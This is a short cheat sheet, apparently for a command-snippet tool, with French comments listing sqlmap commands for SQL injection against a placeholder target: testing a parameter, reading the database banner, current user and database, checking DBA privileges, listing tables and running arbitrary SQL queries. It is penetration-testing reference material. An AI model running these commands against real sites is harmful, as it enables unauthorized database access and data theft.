% sqlmap, web, database, injection

# Test de vulnérabilité
run <ACTION_CMD> sqlmap -u http://<TARGET>/?<NAME_PARAM>=<VALUE_PARAM>

# Version de la base de donnée
run <ACTION_CMD> sqlmap -u <URL> --banner

# Utilisateur courant
run <ACTION_CMD> sqlmap -u <URL> --current-user

# Base de donnée courante
run <ACTION_CMD> sqlmap -u <URL> --current-db

# Privilège utilisateur courant
run <ACTION_CMD> sqlmap -u <URL> --is-dba

# Tables courantes sans les bases systèmes
run <ACTION_CMD> sqlmap -u <URL> --tables --exclude-sys

# Query
run <ACTION_CMD> sqlmap -u <URL> --sql-query "<QUERY>"

$ ACTION_CMD: echo "exec,view" | tr ',' '\n'
